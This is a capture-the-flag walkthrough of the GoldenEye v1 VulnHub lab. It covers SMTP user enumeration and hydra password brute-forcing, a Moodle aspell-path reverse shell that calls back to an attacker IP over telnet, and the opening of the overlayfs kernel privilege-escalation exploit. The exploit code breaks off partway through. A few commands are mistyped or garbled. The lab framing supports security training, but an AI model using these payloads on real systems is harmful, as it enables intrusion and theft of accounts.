GoldenEye v1

VM URL: https://www.vulnhub.com/entry/goldeneye-1,240/

IP address of GoldenEye Virtual Machine: 10.0.133.48

Initial port scans

unicornscan of all TCP ports

root@kali:~/vulnhub/goldeneyev1# unicornscan -I 10.0.133.47:a 10.0.133.47:a 10.0.133.47:a10.0.133.47:a
TCP open                smtp[   25]     from 10.0.133.47  ttl 64
TCP open                http[   80]     from 10.0.133.47  ttl 64
TCP open             unknown[55006]     from 10.0.133.47  ttl 64
TCP open             unknown[55007]     from 10.0.133.47  ttl 64

Further investigation into exposed services

SMTP on port 25

nmap -A scan of port 25 (-A enables: OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute):

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 25
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 11:29 BST
Nmap scan report for 10.0.133.48
Host is up (0.00046s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds

nmap reports the SMTP server as Postfix but is unable to determine the version.

Connect with telnet and probe the server, further information may be learned from banners and it may be possible to enumerate user accounts with SMTP VRFY and or RCTP TO verbs.

root@kali:~/vulnhub/goldeneyev1# telent 10.0.133.48 25
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
220 ubuntu GoldentEye SMTP Electronic-Mail agent
HELO   O example.com
250 ubuntu
VRFY root
252 2.0.0 root
VRFY noexist
550 5.1.1 <noexist>: Recipient address rejected: User unknown in local recipient table

The server presents a customised banner though it does suggest the host OS is ubuntu. “GoldentEye” is also misspelt which might simply be a typo but its worth noting and possibly including in any word lists used for brute forcing logins.

Running VRFY on a user likely to exist, “root”, returns 252: Cannot VRFY user, but will accept message and attempt delivery this doesnt confirm or deny the users existence on the server but an additional VRFY for a user “noexist” returns “550 5.1.1 <noexist>: Recipient address rejected: User unknown in local recipient table”. Its seems we have discovered a way to enumerate email (and likely system) user accounts.

HTTP on port 80

nmap scan of service on port 80:

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48: -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 12:03 BST
Nmap scan report for 10.0.133.48
Host is up (0.00054s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.92 seconds

The web server and version are returned.

Nikto scan of web server:

root@kali:~/vulnhub/goldeneyev1# nickto -h http://severnaya-station.com/gnocertdir/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.133.48
+ Target Hostname:    10.0.133.48
+ Target Port:        80
+ Start Time:         2018-08-03 12:03:09 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2018-08-03 12:03:27 (GMT1) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Visiting the website at http://10.0.133.48/ displays an animated faux login page to “Severnaya Auxiliary Control Station”, looking at the page source and subsequently terminal.js javascript code responsible for the animation effect reveals some encoded credentials.

<html>
<head>
<title>GoldenEye Primary Admin Server</title>
<link rel="stylesheet" href="index.css">
</head>

    <span id="GoldenEyeText" class="typeing"></span><span class='blinker'>&#32;</span>

<script src="terminal.js"></script>

</html>

var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;


  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}

This character encoding looks like HTML encoded ASCII values.

Decode them using python 3’s unescape function in the html library:

root@kali:~/vulnhub/goldeneyev1# python3
Python 3.6.6 (default, Jun 27 2018, 14:44:17)
[GCC 8.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import html
>>> a = ' 'InvincibleHack3r'
>>> html.unescape(a)
'InvincibleHack3r'

Boris’s password is learned: InvincibleHack3r

The faux loging teletype instructs us to navigate to http://10.0.133.48/sev-home, this page requires authentication (HTTP basic auth), try to authenticate with Boris’s credentials:

The credentials work and we are presented with a page informing us to:

“Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system”

The pop3 service is running on non default (not 110 POP3 or 995 POP3S) ports which have already been discovered by our initial port scan (55006 and 55007).

Nikto discovered a file called /splashAdmin.php “Cobalt Qube 3 admin is running” , visiting this page returns Boris’s blog which contains information that may prove useful in future.

The background is hideous and makes the text hard to read so read the source instead:

<html>
<body background="space.gif">
<h2 style="color:green;">Cobalt Qube 3 has been decommissioned</h2>
<br/>
<h3 style="color:white;">We can use this page to put up team photos, discussion, etc. Natalya is not allowed to post here though --Boris</h3>
<br/><br/>
<hr>
<p style="color:red;">Here's me with my new sniper rifle.</p>
<br/><br/>
<img src="sniper.png">
<br/>
<hr>
<p style="color:orange;">
Boris why are you wearing shorts in that photo? You do realize you're stationed above the Arctic circle, correct?
<br/><br/>
BTW your favorite pen broke, but I replaced it with a new special one.
<br/><br/>
Natalya "best coder" S.</p>
<hr>
<p style="color:red;">"License to Kill - Complex Grenade Launchers - No Oddjob" - Unknown"</p>
<hr>
<p style="color:white;">Greetings ya'll! GoldenEye Admin here.
<br/><br/>
For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. <br/>I've replaced GCC with this throughout the GolenEye systems.
<br/><br/>
Boris, no arguing about this, GCC has been removed and that's final!
<br/><br/>
Also why have you been chatting with Xenia in private Boris? She's a new contractor that you've never met before? Are you sure you've never worked together...?
<br/><br/>
-Admin
</p>
<hr>
<p style="color:purple;">
Janus was here
</p>
<hr>
</body>
</html>

From this page and the others discovered we can create a list of possible users on the server:

Boris Natalya Oddjob Admin Xenia Janus

The line about replacing GCC with “the Alternative to GCC, which FreeBSD uses” (Clang) is also noteworthy.

POP3 on port 55006

nmap scan of POP3 on 55006

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55006
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
Nmap scan report for 10.0.133.48
Host is up (0.00054s latency).

PORT      STATE SERVICE  VERSION
55006/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE CAPA USER PIPELINING TOP SASL(PLAIN) RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.61 seconds

The server listening on port 55006 is expecting an SSL/TLS encrypted session to be negotiated so we cannot connect to it manually using telnet to investigate. openssl can instead be used to connect, negotiate encryption and allow communication with the POP3 server using appropriate verbs.

root@kali:~/vulnhub/goldeneyev1# openssl s_client --connect 10.0.133.48:55006
CONNECTED(00000003)
depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
verify return:1

... (certificate chain redacted)

---
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
LIST
-ERR Unknown command.

We learn the server is running a Dovecot version that does not appear to be vulnerable to any known exploits. We can connect to and issue POP3 commands to the server to try and authenticate with the credentials previously discovered, unfortunately this does not result in success.

POP3S on port 55007

nmap scan of POP3 on 55007

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55007
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
Nmap scan report for 10.0.133.48
Host is up (0.00065s latency).

PORT      STATE SERVICE VERSION
55007/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL PIPELINING TOP STLS SASL(PLAIN) CAPA USER AUTH-RESP-CODE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

It is very likely that the same Dovecot server instance is listening on port 55006 and 55007 and just providing a TLS encrypted connection on the former. This is a common configuration for an email server, also the banners and versions as discovered by nmap are the same.

The POP3 service on port 55007 does not use encryption so telnet can be used to connect and issue POP3 commands directly.

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.485090948 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
LIST
-ERR Unknown command.

Seeing as its almost certainly the same back end Dovecot server we are connecting to it makes little sense to preform further interactions on port 55006 as this will net the same results as connecting on port 55007 just with the added overhead and complexity of encryption.

Plan of attack

A strong hint that details required to further compromise the machine can be found on users email accounts was discovered on the GNO (/sev-home/) website. A list of possible users has been enumerated along with a means to verify whether they have email accounts on the server. Given that the Dovecot server version does not appear to be vulnerable to any known exploits that may be useful to access users email it is likely that the account passwords must be brute forced using a wordlist of commonly used passwords or one generated form the pages & banners on GoldenEye that have been discovered.

Exploitation

Enumerate POP3 accounts

From names found on the page at http://10.0.133.48/splashAdmin.php the following list of possible user names was created:

• Boris
• Natalya
• Oddjob
• Admin
• Xenia
• Janus

Run smtp-user-enum to discover if these users have email accounts on the server:

root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -U users.txt -t 10.0.133.48
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 6
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Tue Aug  7 15:40:09 2018 #########
10.0.133.48: Natalya exists
10.0.133.48: Boris exists
######## Scan completed at Tue Aug  7 15:40:09 2018 #########
2 results.

6 queries in 1 seconds (6.0 queries / sec)

Script done on 2018-08-07 15:40:11+01:00

Brute force users passwords with hydra

A wordlist was generated using cewl from the all the web pages so far discovered, mutated using john and then used with hydra to attempt to brute force guess the password for the root, boris and natalya user accounts but this was not successful.

user list:

root@kali:~/vulnhub/goldeneyev1# cat users.txt
root
Boris
Natalya

Brute force the password using hydra with the fasttrack wordlist:

root@kali:~/vulnhub/goldeneyev1# hydra -: users.txt -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 16:42:39
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 666 login tries (l:3/p:222), ~42 tries per task
[DATA] attacking pop3://10.0.133.48:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 586 to do in 00:08h, 16 active
[STATUS] 64.00 tries/min, 192 tries in 00:03h, 474 to do in 00:08h, 16 active

[55007][pop3] host: 10.0.133.48   login: Boris   password: secret1!
[STATUS] 70.43 tries/min, 493 tries in 00:07h, 173 to do in 00:03h, 16 active
[55007][pop3] host: 10.0.133.48   login: Natalya   password: bird
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 16:51:19

Boris and Natalya’s email account credentials are discovered.

Read Boris’s email

Telnet to the Dovecot server, login as boris and retrieve his email:

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id D9E47454B1
    for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. 
I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id C3F2B454B1
    for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id 4B9F4454B1
    for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye.
 Place them in a hidden file within the root directory of this server then remove from this email. 
There can only be one set of these acces codes, and we need to secure them for the final execution. 
If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.
QUIT
+OK Logging out.
Connection closed by foreign host.

No credentials are found but a strong hint that there may be some in natalya’s account is given in that there is not DLP (Data Loss Prevention) in place on the email server.

Read Natalya’s email

Telnet to the Dovecot server, login as boris and retrieve his email:

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: 
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id D5EDA454B1
    for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. 
I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: 
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 17C96454B1
    for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. 
As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.
QUIT
+OK Logging out.
Connection closed by foreign host.

A new service is discovered at severnaya-station.com/gnocertdir with instructions to edit /etc/hosts so that the domain resolves to the servers IP (10.0.133.48). It is likely that the site is an Apache virtual host hence the request header must include the domain and not IP so that Apache serves the correct content.

Add domain to /etc/hosts

root@kali:~/vulnhub/goldeneyev1# echo "10.0.133.48 severnaya-station.com" >> /etc/hosts

Once the mapping of domain to IP is added to /etc/hosts we can browse to the URL

and login with Xenia’s credentials discovered in Natalyas emails.

Exploring Xenia’s Moodle account

A message from “Dr Doak” was discovered, the following suggets Dr Doak may have an email account on the server also: “If you have any questions message me via email, not here.”

smtp-user-enum confirms Dr. Doak does indeed have an email account on the server

root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -u doak -t 10.0.133.48
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Tue Aug  7 18:52:18 2018 #########
10.0.133.48: doak exists
######## Scan completed at Tue Aug  7 18:52:18 2018 #########
1 results.

1 queries in 1 seconds (1.0 queries / sec)

root@kali:~/vulnhub/goldeneyev1# hydra -l doak -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:53:56
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.0.133.48:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 10.0.133.48   login: doak   password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 18:56:16

Username: doak

Password: goat

Reading Doak’s email

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: 
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 97DC24549D
    for ; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.
QUIT
+OK Logging out.
Connection closed by foreign host.

Dr Doak’s Moodle credentials are discovered.

Exploring Dr. Doak’s Moodle account

A file named “s3cret.txt” is discovered on his Moodle file storage:

The file contains:

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

The message directs us to an image file located at: http://severnaya-station.com/dir007key/for-007.jpg maybe the admin credentials are stored here?

download this file and read the EXIF meta data stored in the image file using exif

root@kali:~/vulnhub/goldeneyev1# root@kali:~/vulnhub/goldeneyev1# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Image Description   |eFdpbnRlcjE5OTV4IQ==
Manufacturer        |GoldenEye
Resolution Unit     |Inch
Software            |linux
Artist              |For James
YCbCr Positioning   |Centred
X-Resolution        |72
Y-Resolution        |72
Exif Version        |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment        |For 007
FlashPixVersion     |FlashPix Version 1.0
Colour Space        |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------

The highlighted Image Description field looks suspiciously like a base64 encoded string, lets decode it:

root@kali:~/vulnhub/goldeneyev1# echo -n "eFdpbnRlcjE5OTV4IQ==" | base64 -d
xWinter1995x!

Logging into the admin users Moodle account

The admin user has much greater privileges on the Moodle installation and after some exploration a feature of the application was discovered that may allow remote code execution, RCE, on the server.

The path is set to:

sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'

Breaking this command down it looks like a reverse shell, more specifically metasploits “Unix Command Shell, Double Reverse TCP (telnet)” (cmd/unix/reverse):

• sh -c execute commands read from the string that follows
• The parentheses () group the command that follows and execute it in a subshell
• sleep 4062 piped to the telnet command delays the command from returning
• the first telnet connection is created and it’s output is piped to while loop that tries to execute sh then breaks, STDERR redirected to STDOUT
• pipe this to another telnet connection whos output is redirected to /dev/null (>/dev/null 2>&1)
• & background the command

This builds a reverse shell using the two telnet sessions

@TODO investigate further how this works

@TODO why does a simple reverse shell using bash not work?

Low Privilege shell

Modify the path to aspell changing the IP in the telnet connection to that of our kali box:

sh -c '(sleep 10|telnet 10.0.133.20 4444|while : ; do sh && break; done 2>&1|telnet 10.0.133.20 4444 >/dev/null 2>&1 &)'

The spellchecker used by TinyMCE editor must also be set to “PSpellShell”

netcat cannot be used to receive this reverse shell as it works over two telnet connections, metasploits multihandler is used instead:

root@kali:~/vulnhub/goldeneyev1# msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(multi/handler) > set LHOST payload cmd/unix/reverseORTLPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST 10.0.133.20
LHOST => 10.0.133.20
msf exploit(multi/handler) > run

Trigger the reverse shell by editing a page with TinyMCE and running a spellcheck:

Reverse shell connects back:

[*] Started reverse TCP double handler on 10.0.133.20:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hkIz4NyjVhH7lGXN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "hkIz4NyjVhH7lGXN\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.0.133.20:4444 -> 10.0.133.48:36916) at 2018-08-08 14:22:18 +0100

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

Python was used to spawn an interactive shell from the initial telnet double reverse shell:

python -c 'import pty; pty.spawn("/bin/sh");'

An interesting directory is discovered in the Apache default vhosts webroot /var/www/html/006-final/xvf7-flag/. Navigating to http://10.0.133.48/006-final/xvf7-flag/ displays the “Flag captured” page even though we do not yet have root.

After further enumeration from the low privilege shell there does not appear to be a way to escalate to root privileges without resorting to kernel exploits.

$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/lsb-release
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

searchsploit returns an exploit that should work with the Linux distribution and kernel version on the server:

root@kali:~/vulnhub/goldeneyev1# searchsploit ubuntu 14.04 3.13
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                         |  Path
                                                                                                                                       | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                   | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)              | exploits/linux/local/37293.txt
--------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Use a modified version of: “Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - ‘overlayfs’ Local Privilege Escalation”

URL: https://www.exploit-db.com/exploits/37292/

The exploit must be slightly modified so that the shell script uses clang instead of gcc to compile the binary as gcc is not available (recall the following text “For programming I highly prefer the Alternative to GCC, which FreeBSD uses…” found in the splashAdmin.php page).

The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
